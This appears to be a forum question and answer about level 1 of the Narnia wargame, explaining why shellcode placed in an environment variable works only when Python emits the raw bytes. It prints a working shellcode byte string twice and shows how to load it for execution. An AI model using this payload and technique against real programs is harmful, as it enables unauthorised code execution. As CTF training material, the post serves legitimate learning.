I am currently working through the Narnia CTF, on level 1, where we have a program that executes the contents of an environment variable that we are allowed to set. When I set the environment variable to shellcode like so, the program throws a segfault:
export EGG="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
I looked online, and it seems that people generate the shellcode by having Python print it and capturing the output with command substitution. When I do this with the above shellcode, it looks like this:
export EGG=$(python -c 'print "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"')
When I do it this second way, the program runs successfully. Can someone explain how these two commands are different? Thanks!
Your first command,

export EGG="\xeb\x11...

doesn't actually interpret the escape sequences. Bash does not process \xNN escapes inside double quotes, so you're setting EGG to a string of literal backslashes and hex digits, four characters per intended byte, rather than the raw bytes themselves.
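You can see this with a two-byte stand-in (a quick check; I'm assuming xxd is available here, but od -c works just as well):

export EGG="\x41\x42"
printf '%s' "$EGG" | xxd
# 00000000: 5c78 3431 5c78 3432                      \x41\x42
# eight literal characters (backslash, x, 4, 1, ...), not the two bytes 0x41 0x42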
When you use

export EGG=$(python -c 'print "\xeb\x11...

Python's job is to interpret those escape sequences: the single quotes hand the string to Python with its backslashes intact, Python's string-literal parsing turns each \xNN into a single byte, and print writes the resulting raw bytes to stdout. The command substitution $(...) then captures that output into EGG, stripping the trailing newline that print adds.
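Repeating the stand-in check on this form shows the difference (assuming python here is Python 2):

export EGG=$(python -c 'print "\x41\x42"')
printf '%s' "$EGG" | xxd
# 00000000: 4142                                     AB
# two raw bytes this time, which is what the exploit needs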
Note that this code relies on Python 2, where print is a statement and "\xeb" in a string literal is the single byte 0xeb. Python 3 string handling is very different: strings are Unicode, so print("\xeb\x11...") would emit the (typically UTF-8) encoding of those code points, for example the two bytes c3 ab in place of the single byte eb, which corrupts the shellcode.
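If only Python 3 is available, one workaround (a sketch, not part of the original exercise) is to skip str entirely and write a bytes literal to the binary stdout buffer; the b"" prefix keeps each \xNN escape as a single raw byte:

export EGG=$(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41\x42")')  # substitute the full shellcode for the stand-in
printf '%s' "$EGG" | xxd
# 00000000: 4142                                     AB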